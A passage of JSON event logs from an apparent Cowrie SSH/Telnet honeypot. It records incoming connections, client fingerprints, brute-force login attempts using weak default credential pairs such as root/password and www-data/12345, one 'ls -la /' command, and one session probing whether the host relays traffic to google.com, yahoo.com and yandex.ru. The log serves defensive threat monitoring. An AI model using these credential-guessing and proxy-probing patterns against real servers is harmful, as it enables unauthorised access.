","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T12:32:01.015343Z","src_ip":"212.227.235.229","session":"3b3e2858f49d"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:32:02.622928Z","src_ip":"212.227.235.229","session":"3b3e2858f49d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T12:32:03.397631Z","src_ip":"212.227.235.229","session":"3b3e2858f49d"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T12:32:03.398497Z","src_ip":"212.227.235.229","session":"3b3e2858f49d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:32:03.798481Z","src_ip":"212.227.235.229","session":"3b3e2858f49d"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:32:03.942449Z","src_ip":"212.227.235.229","session":"3b3e2858f49d"}
{"eventid":"cowrie.session.closed","duration":31.15893816947937,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:32:06.254052Z","src_ip":"118.43.92.121","session":"ffab0c53fb36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43182,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9b583a362c4","protocol":"ssh","message":"New connection: 212.227.125.160:43182 (1.2.3.4:22) [session: a9b583a362c4]","sensor":"my-vps","timestamp":"2025-08-28T12:32:07.180458Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57964,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd5df09c4838","protocol":"ssh","message":"New connection: 212.227.125.160:57964 (1.2.3.4:22) [session: cd5df09c4838]","sensor":"my-vps","timestamp":"2025-08-28T12:32:08.940164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:32:08.941015Z","src_ip":"212.227.125.160","session":"cd5df09c4838"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:32:09.110324Z","src_ip":"212.227.125.160","session":"cd5df09c4838"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"12345","message":"login attempt [www-data/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:32:09.958807Z","src_ip":"212.227.125.160","session":"cd5df09c4838"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:32:11.255356Z","src_ip":"212.227.125.160","session":"cd5df09c4838"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:32:14.409597Z","src_ip":"212.227.125.160","session":"a9b583a362c4"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":45466,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c39f596a4b9","protocol":"ssh","message":"New connection: 185.246.128.133:45466 (1.2.3.4:22) [session: 8c39f596a4b9]","sensor":"my-vps","timestamp":"2025-08-28T12:32:22.926247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.5.5","message":"Remote SSH version: SSH-2.0-libssh_0.5.5","sensor":"my-vps","timestamp":"2025-08-28T12:32:22.927126Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-28T12:32:22.972062Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:32:23.873934Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":30574,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:30574","sensor":"my-vps","timestamp":"2025-08-28T12:32:23.919698Z","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T12:32:23.965970Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":1894,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:1894","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.099151Z","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.143995Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":1692,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:1692","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.275142Z","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.319988Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":4451,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:4451","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.451096Z","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.496303Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"185.246.128.133","src_port":28064,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:28064","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.627152Z","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.672436Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"185.246.128.133","src_port":12174,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12174","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.803354Z","session":"8c39f596a4b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.848563Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:32:24.894250Z","src_ip":"185.246.128.133","session":"8c39f596a4b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48312,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa978f08aacf","protocol":"ssh","message":"New connection: 212.227.125.160:48312 (1.2.3.4:22) [session: fa978f08aacf]","sensor":"my-vps","timestamp":"2025-08-28T12:32:49.176969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:32:49.177812Z","src_ip":"212.227.125.160","session":"fa978f08aacf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:32:49.342615Z","src_ip":"212.227.125.160","session":"fa978f08aacf"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"12345678","message":"login attempt [www-data/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:32:49.872917Z","src_ip":"212.227.125.160","session":"fa978f08aacf"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:32:51.039390Z","src_ip":"212.227.125.160","session":"fa978f08aacf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56674,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a0f64ec2ff0","protocol":"ssh","message":"New connection: 212.227.235.229:56674 (1.2.3.4:22) [session: 3a0f64ec2ff0]","sensor":"my-vps","timestamp":"2025-08-28T12:32:55.145479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:32:55.224386Z","src_ip":"212.227.235.229","session":"3a0f64ec2ff0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T12:32:55.307817Z","src_ip":"212.227.235.229","session":"3a0f64ec2ff0"}
{"eventid":"cowrie.login.failed","username":"pfsense","password":"pfsense","message":"login attempt [pfsense/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T12:32:55.618022Z","src_ip":"212.227.235.229","session":"3a0f64ec2ff0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:32:56.803212Z","src_ip":"212.227.235.229","session":"3a0f64ec2ff0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45478,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce014e0657f2","protocol":"ssh","message":"New connection: 212.227.125.160:45478 (1.2.3.4:22) [session: ce014e0657f2]","sensor":"my-vps","timestamp":"2025-08-28T12:33:29.973001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:33:29.973888Z","src_ip":"212.227.125.160","session":"ce014e0657f2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:33:30.155671Z","src_ip":"212.227.125.160","session":"ce014e0657f2"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"qwerty","message":"login attempt [www-data/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:33:30.703894Z","src_ip":"212.227.125.160","session":"ce014e0657f2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:33:31.888024Z","src_ip":"212.227.125.160","session":"ce014e0657f2"}
{"eventid":"cowrie.session.connect","src_ip":"45.79.207.181","src_port":53653,"dst_ip":"1.2.3.4","dst_port":22,"session":"6769e08e49f6","protocol":"ssh","message":"New connection: 45.79.207.181:53653 (1.2.3.4:22) [session: 6769e08e49f6]","sensor":"my-vps","timestamp":"2025-08-28T12:33:53.563441Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:33:53.758300Z","src_ip":"45.79.207.181","session":"6769e08e49f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:33:58.730803Z","src_ip":"176.65.149.186","session":"b3e8fadd5a33"}
{"eventid":"cowrie.session.closed","duration":180.0714144706726,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:33:58.734257Z","src_ip":"176.65.149.186","session":"b3e8fadd5a33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43396,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba2d04d3ff4b","protocol":"ssh","message":"New connection: 212.227.125.160:43396 (1.2.3.4:22) [session: ba2d04d3ff4b]","sensor":"my-vps","timestamp":"2025-08-28T12:34:11.892928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:34:12.002952Z","src_ip":"212.227.125.160","session":"ba2d04d3ff4b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:34:12.181464Z","src_ip":"212.227.125.160","session":"ba2d04d3ff4b"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"123123","message":"login attempt [www-data/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:34:12.787220Z","src_ip":"212.227.125.160","session":"ba2d04d3ff4b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:34:13.966726Z","src_ip":"212.227.125.160","session":"ba2d04d3ff4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35288,"dst_ip":"1.2.3.4","dst_port":22,"session":"adf5d87c8fe3","protocol":"ssh","message":"New connection: 212.227.125.160:35288 (1.2.3.4:22) [session: adf5d87c8fe3]","sensor":"my-vps","timestamp":"2025-08-28T12:34:50.866250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:34:50.868408Z","src_ip":"212.227.125.160","session":"adf5d87c8fe3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:34:51.042111Z","src_ip":"212.227.125.160","session":"adf5d87c8fe3"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"111111","message":"login attempt [www-data/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:34:51.564355Z","src_ip":"212.227.125.160","session":"adf5d87c8fe3"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:34:52.739613Z","src_ip":"212.227.125.160","session":"adf5d87c8fe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52150,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7908ff9205a","protocol":"telnet","message":"New connection: 212.227.235.229:52150 (1.2.3.4:23) [session: d7908ff9205a]","sensor":"my-vps","timestamp":"2025-08-28T12:34:59.998789Z"}
